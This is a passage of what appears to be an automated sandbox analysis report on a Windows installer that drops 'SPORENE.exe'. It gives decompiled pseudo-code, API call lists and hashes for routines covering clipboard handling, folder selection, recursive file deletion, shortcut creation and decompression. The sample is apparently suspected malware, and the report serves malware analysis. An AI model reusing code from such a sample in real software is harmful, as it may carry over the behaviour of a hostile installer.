                • OpenClipboard.USER32(00000000), ref: 00405A00
                • EmptyClipboard.USER32 ref: 00405A06
                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                • GlobalLock.KERNEL32 ref: 00405A1C
                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                • SetClipboardData.USER32 ref: 00405A5B
                • CloseClipboard.USER32 ref: 00405A61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID: {
                • API String ID: 590372296-366298937
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed int _v12;
                				long _v16;
                				long _v20;
                				long _v24;
                				char _v28;
                				intOrPtr _v32;
                				long _v36;
                				char _v40;
                				unsigned int _v44;
                				signed int _v48;
                				WCHAR* _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				WCHAR* _v72;
                				void _v76;
                				struct HWND__* _v80;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t82;
                				long _t87;
                				short* _t89;
                				void* _t95;
                				signed int _t96;
                				int _t109;
                				signed short _t114;
                				signed int _t118;
                				struct HWND__** _t122;
                				intOrPtr* _t138;
                				WCHAR* _t146;
                				unsigned int _t150;
                				signed int _t152;
                				unsigned int _t156;
                				signed int _t158;
                				signed int* _t159;
                				signed int* _t160;
                				struct HWND__* _t166;
                				struct HWND__* _t167;
                				int _t169;
                				unsigned int _t197;
                
                				_t156 = __edx;
                				_t82 =  *0x42c240;
                				_v32 = _t82;
                				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                				if(_a8 == 0x40b) {
                					E00405B81(0x3fb, _t146);
                					E004067C4(_t146);
                				}
                				_t167 = _a4;
                				if(_a8 != 0x110) {
                					L8:
                					if(_a8 != 0x111) {
                						L20:
                						if(_a8 == 0x40f) {
                							L22:
                							_v8 = _v8 & 0x00000000;
                							_v12 = _v12 & 0x00000000;
                							E00405B81(0x3fb, _t146);
                							if(E00405F14(_t186, _t146) == 0) {
                								_v8 = 1;
                							}
                							E0040653D(0x42b238, _t146);
                							_t87 = E0040690A(1);
                							_v16 = _t87;
                							if(_t87 == 0) {
                								L30:
                								E0040653D(0x42b238, _t146);
                								_t89 = E00405EB7(0x42b238);
                								_t158 = 0;
                								if(_t89 != 0) {
                									 *_t89 = 0;
                								}
                								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                									goto L35;
                								} else {
                									_t169 = 0x400;
                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                									asm("cdq");
                									_v48 = _t109;
                									_v44 = _t156;
                									_v12 = 1;
                									goto L36;
                								}
                							} else {
                								_t159 = 0;
                								if(0 == 0x42b238) {
                									goto L30;
                								} else {
                									goto L26;
                								}
                								while(1) {
                									L26:
                									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                									if(_t114 != 0) {
                										break;
                									}
                									if(_t159 != 0) {
                										 *_t159 =  *_t159 & _t114;
                									}
                									_t160 = E00405E58(0x42b238);
                									 *_t160 =  *_t160 & 0x00000000;
                									_t159 = _t160;
                									 *_t159 = 0x5c;
                									if(_t159 != 0x42b238) {
                										continue;
                									} else {
                										goto L30;
                									}
                								}
                								_t150 = _v44;
                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                								_v44 = _t150 >> 0xa;
                								_v12 = 1;
                								_t158 = 0;
                								__eflags = 0;
                								L35:
                								_t169 = 0x400;
                								L36:
                								_t95 = E00404E27(5);
                								if(_v12 != _t158) {
                									_t197 = _v44;
                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                										_v8 = 2;
                									}
                								}
                								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                									E00404E0F(0x3ff, 0xfffffffb, _t95);
                									if(_v12 == _t158) {
                										SetDlgItemTextW(_a4, _t169, 0x42b228);
                									} else {
                										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                									}
                								}
                								_t96 = _v8;
                								 *0x434fa4 = _t96;
                								if(_t96 == _t158) {
                									_v8 = E0040140B(7);
                								}
                								if(( *(_v32 + 0x14) & _t169) != 0) {
                									_v8 = _t158;
                								}
                								E004044BB(0 | _v8 == _t158);
                								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                									E004048E3();
                								}
                								 *0x42d258 = _t158;
                								goto L53;
                							}
                						}
                						_t186 = _a8 - 0x405;
                						if(_a8 != 0x405) {
                							goto L53;
                						}
                						goto L22;
                					}
                					_t118 = _a12 & 0x0000ffff;
                					if(_t118 != 0x3fb) {
                						L12:
                						if(_t118 == 0x3e9) {
                							_t152 = 7;
                							memset( &_v76, 0, _t152 << 2);
                							_v80 = _t167;
                							_v72 = 0x42d268;
                							_v60 = E00404CE0;
                							_v56 = _t146;
                							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                							_t122 =  &_v80;
                							_v64 = 0x41;
                							__imp__SHBrowseForFolderW(_t122);
                							if(_t122 == 0) {
                								_a8 = 0x40f;
                							} else {
                								__imp__CoTaskMemFree(_t122);
                								E00405E0C(_t146);
                								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\engineer\\AppData\\Local\\Temp") {
                									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                										lstrcatW(_t146, 0x432ea0);
                									}
                								}
                								 *0x42d258 =  *0x42d258 + 1;
                								SetDlgItemTextW(_t167, 0x3fb, _t146);
                							}
                						}
                						goto L20;
                					}
                					if(_a12 >> 0x10 != 0x300) {
                						goto L53;
                					}
                					_a8 = 0x40f;
                					goto L12;
                				} else {
                					_t166 = GetDlgItem(_t167, 0x3fb);
                					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                						E00405E0C(_t146);
                					}
                					 *0x433ed8 = _t167;
                					SetWindowTextW(_t166, _t146);
                					_push( *((intOrPtr*)(_a16 + 0x34)));
                					_push(1);
                					E00404499(_t167);
                					_push( *((intOrPtr*)(_a16 + 0x30)));
                					_push(0x14);
                					E00404499(_t167);
                					E004044CE(_t166);
                					_t138 = E0040690A(8);
                					if(_t138 == 0) {
                						L53:
                						return E00404500(_a8, _a12, _a16);
                					} else {
                						 *_t138(_t166, 1);
                						goto L8;
                					}
                				}
                			}
                0x004049f6
                0x004049fd
                0x00404a03
                0x00404a0c
                0x00404a0f
                0x00404a12
                0x00404a1a
                0x00404a1d
                0x00404a20
                0x00404a26
                0x00404a2d
                0x00404a34
                0x00404ccb
                0x00404cdd
                0x00404a3a
                0x00404a3d
                0x00000000
                0x00404a3d
                0x00404a34

                APIs
                • GetDlgItem.USER32 ref: 004049D9
                • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,0042D268,00000000,?,?), ref: 00404AF1
                • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\SPORENE.exe), ref: 00404AFD
                • SetDlgItemTextW.USER32 ref: 00404B0F
                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                  • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                  • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                  • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\SPORENE.exe
                • API String ID: 2624150263-3330946844
                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                				signed int _v8;
                				signed int _v12;
                				short _v556;
                				short _v558;
                				struct _WIN32_FIND_DATAW _v604;
                				signed int _t38;
                				signed int _t52;
                				signed int _t55;
                				signed int _t62;
                				void* _t64;
                				signed char _t65;
                				WCHAR* _t66;
                				void* _t67;
                				WCHAR* _t68;
                				void* _t70;
                
                				_t65 = _a8;
                				_t68 = _a4;
                				_v8 = _t65 & 0x00000004;
                				_t38 = E00405F14(__eflags, _t68);
                				_v12 = _t38;
                				if((_t65 & 0x00000008) != 0) {
                					_t62 = DeleteFileW(_t68);
                					asm("sbb eax, eax");
                					_t64 =  ~_t62 + 1;
                					 *0x434f88 =  *0x434f88 + _t64;
                					return _t64;
                				}
                				_a4 = _t65;
                				_t8 =  &_a4;
                				 *_t8 = _a4 & 0x00000001;
                				__eflags =  *_t8;
                				if( *_t8 == 0) {
                					L5:
                					E0040653D(0x42f270, _t68);
                					__eflags = _a4;
                					if(_a4 == 0) {
                						E00405E58(_t68);
                					} else {
                						lstrcatW(0x42f270, L"\\*.*");
                					}
                					__eflags =  *_t68;
                					if( *_t68 != 0) {
                						L10:
                						lstrcatW(_t68, 0x40a014);
                						L11:
                						_t66 =  &(_t68[lstrlenW(_t68)]);
                						_t38 = FindFirstFileW(0x42f270,  &_v604);
                						_t70 = _t38;
                						__eflags = _t70 - 0xffffffff;
                						if(_t70 == 0xffffffff) {
                							L26:
                							__eflags = _a4;
                							if(_a4 != 0) {
                								_t30 = _t66 - 2;
                								 *_t30 =  *(_t66 - 2) & 0x00000000;
                								__eflags =  *_t30;
                							}
                							goto L28;
                						} else {
                							goto L12;
                						}
                						do {
                							L12:
                							__eflags = _v604.cFileName - 0x2e;
                							if(_v604.cFileName != 0x2e) {
                								L16:
                								E0040653D(_t66,  &(_v604.cFileName));
                								__eflags = _v604.dwFileAttributes & 0x00000010;
                								if(__eflags == 0) {
                									_t52 = E00405C01(__eflags, _t68, _v8);
                									__eflags = _t52;
                									if(_t52 != 0) {
                										E0040559F(0xfffffff2, _t68);
                									} else {
                										__eflags = _v8 - _t52;
                										if(_v8 == _t52) {
                											 *0x434f88 =  *0x434f88 + 1;
                										} else {
                											E0040559F(0xfffffff1, _t68);
                											E004062FD(_t67, _t68, 0);
                										}
                									}
                								} else {
                									__eflags = (_a8 & 0x00000003) - 3;
                									if(__eflags == 0) {
                										E00405C49(__eflags, _t68, _a8);
                									}
                								}
                								goto L24;
                							}
                							__eflags = _v558;
                							if(_v558 == 0) {
                								goto L24;
                							}
                							__eflags = _v558 - 0x2e;
                							if(_v558 != 0x2e) {
                								goto L16;
                							}
                							__eflags = _v556;
                							if(_v556 == 0) {
                								goto L24;
                							}
                							goto L16;
                							L24:
                							_t55 = FindNextFileW(_t70,  &_v604);
                							__eflags = _t55;
                						} while (_t55 != 0);
                						_t38 = FindClose(_t70);
                						goto L26;
                					}
                					__eflags =  *0x42f270 - 0x5c;
                					if( *0x42f270 != 0x5c) {
                						goto L11;
                					}
                					goto L10;
                				} else {
                					__eflags = _t38;
                					if(_t38 == 0) {
                						L28:
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L36:
                							return _t38;
                						}
                						__eflags = _v12;
                						if(_v12 != 0) {
                							_t38 = E00406873(_t68);
                							__eflags = _t38;
                							if(_t38 == 0) {
                								goto L36;
                							}
                							E00405E0C(_t68);
                							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                							__eflags = _t38;
                							if(_t38 != 0) {
                								return E0040559F(0xffffffe5, _t68);
                							}
                							__eflags = _v8;
                							if(_v8 == 0) {
                								goto L30;
                							}
                							E0040559F(0xfffffff1, _t68);
                							return E004062FD(_t67, _t68, 0);
                						}
                						L30:
                						 *0x434f88 =  *0x434f88 + 1;
                						return _t38;
                					}
                					__eflags = _t65 & 0x00000002;
                					if((_t65 & 0x00000002) == 0) {
                						goto L28;
                					}
                					goto L5;
                				}
                			}



















                APIs
                • DeleteFileW.KERNEL32(?,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                • FindClose.KERNEL32(00000000), ref: 00405DA2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                • API String ID: 2035342205-2424138518
                • Opcode ID: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                • Opcode Fuzzy Hash: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E004021AA(void* __eflags) {
                				signed int _t52;
                				void* _t56;
                				intOrPtr* _t60;
                				intOrPtr _t61;
                				intOrPtr* _t62;
                				intOrPtr* _t64;
                				intOrPtr* _t66;
                				intOrPtr* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t72;
                				intOrPtr* _t74;
                				intOrPtr* _t76;
                				intOrPtr* _t78;
                				intOrPtr* _t80;
                				void* _t83;
                				intOrPtr* _t91;
                				signed int _t101;
                				signed int _t105;
                				void* _t107;
                
                				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                				_t52 =  *(_t107 - 0x20);
                				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                				_t101 = _t52 & 0x00008000;
                				_t105 = _t52 >> 0x0000000c & 0x00000007;
                				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                					E00402DA6(0x21);
                				}
                				_t56 = _t107 + 8;
                				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                				if(_t56 < _t83) {
                					L14:
                					 *((intOrPtr*)(_t107 - 4)) = 1;
                					_push(0xfffffff0);
                				} else {
                					_t60 =  *((intOrPtr*)(_t107 + 8));
                					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                					if(_t61 >= _t83) {
                						_t64 =  *((intOrPtr*)(_t107 + 8));
                						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                						if(_t101 == _t83) {
                							_t80 =  *((intOrPtr*)(_t107 + 8));
                							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\engineer\\AppData\\Local\\Temp");
                						}
                						if(_t105 != _t83) {
                							_t78 =  *((intOrPtr*)(_t107 + 8));
                							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                						}
                						_t66 =  *((intOrPtr*)(_t107 + 8));
                						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                						if( *_t91 != _t83) {
                							_t76 =  *((intOrPtr*)(_t107 + 8));
                							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                						}
                						_t68 =  *((intOrPtr*)(_t107 + 8));
                						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                						_t70 =  *((intOrPtr*)(_t107 + 8));
                						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                						}
                						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                						 *((intOrPtr*)( *_t72 + 8))(_t72);
                					}
                					_t62 =  *((intOrPtr*)(_t107 + 8));
                					 *((intOrPtr*)( *_t62 + 8))(_t62);
                					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                						_push(0xfffffff4);
                					} else {
                						goto L14;
                					}
                				}
                				E00401423();
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                				return 0;
                			}























                APIs
                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp
                Similarity
                • API ID: CreateInstance
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 542301482-1104044542
                • Opcode ID: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
                • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                • Opcode Fuzzy Hash: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
                • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E0040290B(short __ebx, short* __edi) {
                				void* _t21;
                
                				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                					_push(_t21 - 0x2b0);
                					_push(__edi);
                					E0040653D();
                				} else {
                					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                					 *__edi = __ebx;
                					 *((intOrPtr*)(_t21 - 4)) = 1;
                				}
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                				return 0;
                			}





                APIs
                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp
                Similarity
                • API ID: FileFindFirst
                • String ID:
                • API String ID: 1974802433-0
                • Opcode ID: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
                • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                • Opcode Fuzzy Hash: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
                • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E00406D85(signed int __ebx, signed int* __esi) {
                				signed int _t367;
                				signed int _t396;
                				signed int _t413;
                				signed int _t414;
                				signed int* _t417;
                				void* _t419;
                
                				L0:
                				while(1) {
                					L0:
                					_t417 = __esi;
                					_t396 = __ebx;
                					if( *(_t419 - 0x34) == 0) {
                						break;
                					}
                					L55:
                					__eax =  *(__ebp - 0x38);
                					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                					__ecx = __ebx;
                					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                					__ebx = __ebx + 8;
                					while(1) {
                						L56:
                						if(__ebx < 0xe) {
                							goto L0;
                						}
                						L57:
                						__eax =  *(__ebp - 0x40);
                						__eax =  *(__ebp - 0x40) & 0x00003fff;
                						__ecx = __eax;
                						__esi[1] = __eax;
                						__ecx = __eax & 0x0000001f;
                						if(__cl > 0x1d) {
                							L9:
                							_t414 = _t413 | 0xffffffff;
                							 *_t417 = 0x11;
                							L10:
                							_t417[0x147] =  *(_t419 - 0x40);
                							_t417[0x146] = _t396;
                							( *(_t419 + 8))[1] =  *(_t419 - 0x34);
                							L11:
                							 *( *(_t419 + 8)) =  *(_t419 - 0x38);
                							_t417[0x26ea] =  *(_t419 - 0x30);
                							E004074F4( *(_t419 + 8));
                							return _t414;
                						}
                						L58:
                						__eax = __eax & 0x000003e0;
                						if(__eax > 0x3a0) {
                							goto L9;
                						}
                						L59:
                						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                						__ebx = __ebx - 0xe;
                						_t94 =  &(__esi[2]);
                						 *_t94 = __esi[2] & 0x00000000;
                						 *__esi = 0xc;
                						while(1) {
                							L60:
                							__esi[1] = __esi[1] >> 0xa;
                							__eax = (__esi[1] >> 0xa) + 4;
                							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                								goto L68;
                							}
                							L61:
                							while(1) {
                								L64:
                								if(__ebx >= 3) {
                									break;
                								}
                								L62:
                								if( *(__ebp - 0x34) == 0) {
                									goto L159;
                								}
                								L63:
                								__eax =  *(__ebp - 0x38);
                								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                								__ecx = __ebx;
                								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                								__ebx = __ebx + 8;
                							}
                							L65:
                							__ecx = __esi[2];
                							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                							__ebx = __ebx - 3;
                							_t108 = __ecx + 0x4084d4; // 0x121110
                							__ecx =  *_t108;
                							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                							__ecx = __esi[1];
                							__esi[2] = __esi[2] + 1;
                							__eax = __esi[2];
                							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                								goto L64;
                							}
                							L66:
                							while(1) {
                								L68:
                								if(__esi[2] >= 0x13) {
                									break;
                								}
                								L67:
                								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                								__eax =  *_t119;
                								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                								_t126 =  &(__esi[2]);
                								 *_t126 = __esi[2] + 1;
                							}
                							L69:
                							__ecx = __ebp - 8;
                							__edi =  &(__esi[0x143]);
                							 &(__esi[0x148]) =  &(__esi[0x144]);
                							__eax = 0;
                							 *(__ebp - 8) = 0;
                							__eax =  &(__esi[3]);
                							 *__edi = 7;
                							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                							if(__eax != 0) {
                								L72:
                								 *__esi = 0x11;
                								while(1) {
                									L157:
                									_t367 =  *_t417;
                									if(_t367 > 0xf) {
                										break;
                									}
                									L1:
